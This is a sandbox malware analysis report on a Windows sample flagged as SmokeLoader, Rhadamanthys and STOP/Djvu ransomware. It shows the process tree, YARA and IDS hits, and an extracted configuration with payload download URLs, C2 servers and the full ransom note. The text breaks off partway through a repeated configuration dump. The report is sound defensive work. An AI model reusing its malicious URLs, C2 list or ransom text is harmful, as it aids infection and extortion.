Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:808616
MD5:0a0416b98547fb41ec314c676979779e
SHA1:2e572a453e97f1d44f08ac1ea4065378dd4082a8
SHA256:5ea4451ca1ce36db2dc6e7a85f07c748ddbb758b65f2194d734afd08bd141126
Infos:

Detection

Djvu, RHADAMANTHYS, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Tries to harvest and steal Bitcoin Wallet information
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Detected VMProtect packer
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Yara detected Keylogger Generic
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Installs a raw input device (often for capturing keystrokes)
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Connects to several IPs in different countries
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 5176 cmdline: C:\Users\user\Desktop\file.exe MD5: 0A0416B98547FB41EC314C676979779E)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 1128.exe (PID: 4608 cmdline: C:\Users\user\AppData\Local\Temp\1128.exe MD5: 93CEC9D367D574FC3120469D0340FB39)
        • conhost.exe (PID: 920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rundll32.exe (PID: 5500 cmdline: "C:\Users\user\AppData\Roaming\vcredist_5f4680.dll",Options_RunDLL 0600cc00-00e0-0478-0ea3-ae35d8b7780b MD5: 73C519F050C20580F8A62C849D49215A)
      • A4A.exe (PID: 1332 cmdline: C:\Users\user\AppData\Local\Temp\A4A.exe MD5: 34365553C6887DD20EEE38713CEEDECA)
        • A4A.exe (PID: 2208 cmdline: C:\Users\user\AppData\Local\Temp\A4A.exe MD5: 34365553C6887DD20EEE38713CEEDECA)
          • icacls.exe (PID: 5428 cmdline: icacls "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
      • 8EAD.exe (PID: 4784 cmdline: C:\Users\user\AppData\Local\Temp\8EAD.exe MD5: 422BAE02B141829FF15435A9116E33F7)
      • F207.exe (PID: 4780 cmdline: C:\Users\user\AppData\Local\Temp\F207.exe MD5: A87C48E5E8F12F9FF6F6D868BF9D9252)
      • DE4C.exe (PID: 4776 cmdline: C:\Users\user\AppData\Local\Temp\DE4C.exe MD5: EDB228CBA3FC937A6008E00B44A28343)
        • WerFault.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 42FE.exe (PID: 1092 cmdline: C:\Users\user\AppData\Local\Temp\42FE.exe MD5: 710475FAD4072F93192DB19F14847C42)
        • llpb1133.exe (PID: 4428 cmdline: "C:\Users\user\AppData\Local\Temp\llpb1133.exe" MD5: E80EFC25A192B860387B90C209EF9D6B)
        • yuzhenzhang.exe (PID: 1788 cmdline: "C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe" MD5: B9363486500E209C05F97330226BBF8A)
          • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • 352F.exe (PID: 1328 cmdline: C:\Users\user\AppData\Local\Temp\352F.exe MD5: 710475FAD4072F93192DB19F14847C42)
        • llpb1133.exe (PID: 3952 cmdline: "C:\Users\user\AppData\Local\Temp\llpb1133.exe" MD5: E80EFC25A192B860387B90C209EF9D6B)
      • 9760.exe (PID: 3960 cmdline: C:\Users\user\AppData\Local\Temp\9760.exe MD5: 42FBE2A0D64819B3D2FF1E29208A5D77)
        • WerFault.exe (PID: 4572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 849F.exe (PID: 4968 cmdline: C:\Users\user\AppData\Local\Temp\849F.exe MD5: 8D702FEEDAFB6BA663FA84DD131E049A)
      • ECAC.exe (PID: 6092 cmdline: C:\Users\user\AppData\Local\Temp\ECAC.exe MD5: 34365553C6887DD20EEE38713CEEDECA)
        • ECAC.exe (PID: 5488 cmdline: C:\Users\user\AppData\Local\Temp\ECAC.exe MD5: 34365553C6887DD20EEE38713CEEDECA)
      • WerFault.exe (PID: 1816 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3960 -ip 3960 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • DC3D.exe (PID: 3344 cmdline: C:\Users\user\AppData\Local\Temp\DC3D.exe MD5: 89AF5F0E7D2B08F92443BD39F80948C8)
        • DC3D.exe (PID: 4432 cmdline: C:\Users\user\AppData\Local\Temp\DC3D.exe MD5: 89AF5F0E7D2B08F92443BD39F80948C8)
      • A4A.exe (PID: 5924 cmdline: "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe" --AutoStart MD5: 34365553C6887DD20EEE38713CEEDECA)
  • rirdbih (PID: 4936 cmdline: C:\Users\user\AppData\Roaming\rirdbih MD5: 0A0416B98547FB41EC314C676979779E)
  • A4A.exe (PID: 1284 cmdline: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe --Task MD5: 34365553C6887DD20EEE38713CEEDECA)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
STOPSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UQkYLBSiQ4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0647JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6pr4lrmSF+nrv+WJ2ojW\\\\nOwnynOY9I8+LodREL0771QE\\/eG6rOsC0fpMQ9pzAOAr\\/mzGF6pCHp2xgQT98Y2Es\\\\nK17rBgbhru6S98R1Vy6iSd14yiRg9AYFrfYTz3slknBcthhlCQlHPUafEvGWl52w\\\\nTJDdKYcpnitEemrWdAaNig+7sCEbwPtjqGBogMyhNhju1rDhmnU5klYQgI6HVzRr\\\\nIHPFB2M26tUPNgtjGhK1TJQgJIVN3N7f1dJ\\/2+ef59Jh\\/N8EIBwCZPQfmqzfM3rt\\\\n7TVKl4NSOemVMbZx9eiABALPqM5RBn\\/jrVXMLJyp4GBVHuG2lK1N2PWVyZGL5Vxb\\\\nbQIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
  • 0x11b0fa3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
  • 0x16d7328:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
dump.pcapWindows_Trojan_Clipbanker_787b130bunknownunknown
  • 0x11b0c9a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
  • 0x16d701f:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
  • 0x11b0d27:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
  • 0x16d70ac:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
  • 0x11b0d27:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
  • 0x16d70ac:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
  • 0x11b104d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
  • 0x16d73d2:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
  • 0x11b11b3:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
  • 0x16d74a0:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
SourceRuleDescriptionAuthorStrings
0000000E.00000002.705303961.0000000000606000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1648:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000002.439049903.00000000005E6000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x6353:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000002.706906368.0000000002210000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.287939420.0000000000580000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.288156883.0000000000746000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x622f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 67 entries
SourceRuleDescriptionAuthorStrings
27.2.DC3D.exe.22d15a0.1.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth (Nextron Systems)
  • 0xdf7ea:$s1: http://
  • 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xdf7ea:$f1: http://
27.2.DC3D.exe.22d15a0.1.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    27.2.DC3D.exe.22d15a0.1.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xfd288:$x1: C:\SystemID\PersonalID.txt
    • 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0xfd6ec:$s1: " --AutoStart
    • 0xfd700:$s1: " --AutoStart
    • 0x101348:$s2: --ForNetRes
    • 0x101310:$s3: --Admin
    • 0x101790:$s4: %username%
    • 0x1018b4:$s5: ?pid=
    • 0x1018c0:$s6: &first=true
    • 0x1018d8:$s6: &first=false
    • 0xfd7f4:$s7: delself.bat
    • 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    27.2.DC3D.exe.22d15a0.1.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    18.2.A4A.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth (Nextron Systems)
    • 0xe0dea:$s1: http://
    • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
    • 0xe0dea:$f1: http://
    Click to see the 60 entries
    No Sigma rule has matched
    Timestamp:192.168.2.6179.43.176.649718802043202 02/15/23-16:04:35.265265
    SID:2043202
    Source Port:49718
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.68.8.8.859504532023883 02/15/23-16:04:31.105143
    SID:2023883
    Source Port:59504
    Destination Port:53
    Protocol:UDP
    Classtype:Potentially Bad Traffic
    Timestamp:179.43.176.6192.168.2.680497182853001 02/15/23-16:04:35.292249
    SID:2853001
    Source Port:80
    Destination Port:49718
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://autoacores.com/systems/ChromeSetup.exeURL Reputation: Label: malware
    Source: http://23.106.124.133/totti.exeURL Reputation: Label: malware
    Source: https://xv.yxzgamen.com/logo.pngURL Reputation: Label: malware
    Source: http://bihsy.com/test2/get.phpAvira URL Cloud: Label: malware
    Source: http://179.43.176.6/getmod/xij5ka.ev8rAvira URL Cloud: Label: malware
    Source: http://80.85.241.98/s.exeAvira URL Cloud: Label: malware
    Source: http://uaery.top/dl/build.exeAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Temp\352F.exeAvira: detection malicious, Label: HEUR/AGEN.1234960
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeAvira: detection malicious, Label: HEUR/AGEN.1234960
    Source: file.exeReversingLabs: Detection: 30%
    Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exeReversingLabs: Detection: 30%
    Source: C:\Users\user\AppData\Local\Temp\1128.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Temp\170F.tmp.exeReversingLabs: Detection: 43%
    Source: C:\Users\user\AppData\Local\Temp\1AED.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Temp\352F.exeReversingLabs: Detection: 76%
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeReversingLabs: Detection: 76%
    Source: C:\Users\user\AppData\Local\Temp\849F.exeReversingLabs: Detection: 33%
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeReversingLabs: Detection: 64%
    Source: C:\Users\user\AppData\Local\Temp\9760.exeReversingLabs: Detection: 30%
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeReversingLabs: Detection: 30%
    Source: C:\Users\user\AppData\Local\Temp\ADEC.exeReversingLabs: Detection: 28%
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeReversingLabs: Detection: 46%
    Source: C:\Users\user\AppData\Local\Temp\DE4C.exeReversingLabs: Detection: 53%
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeReversingLabs: Detection: 30%
    Source: C:\Users\user\AppData\Local\Temp\F207.exeReversingLabs: Detection: 30%
    Source: C:\Users\user\AppData\Local\Temp\FD42.exeReversingLabs: Detection: 46%
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeReversingLabs: Detection: 61%
    Source: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exeReversingLabs: Detection: 80%
    Source: C:\Users\user\AppData\Roaming\gdrdbihReversingLabs: Detection: 33%
    Source: C:\Users\user\AppData\Roaming\rirdbihReversingLabs: Detection: 30%
    Source: C:\Users\user\AppData\Roaming\sardbihReversingLabs: Detection: 30%
    Source: file.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\gdrdbihJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\C597.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\DE4C.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\352F.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\9760.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\1128.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\B336.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\sardbihJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\1AED.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\170F.tmp.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\rirdbihJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\F207.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\849F.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\ADEC.exeJoe Sandbox ML: detected
    Source: 1.3.explorer.exe.10418890.0.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 1.3.explorer.exe.104b38a0.1.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 1.3.explorer.exe.11505090.2.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 1.3.explorer.exe.115ac8a0.3.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 9.2.1128.exe.ee907c.2.unpackAvira: Label: TR/Patched.Gen
    Source: 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UQkYLBSiQ4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0647JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", 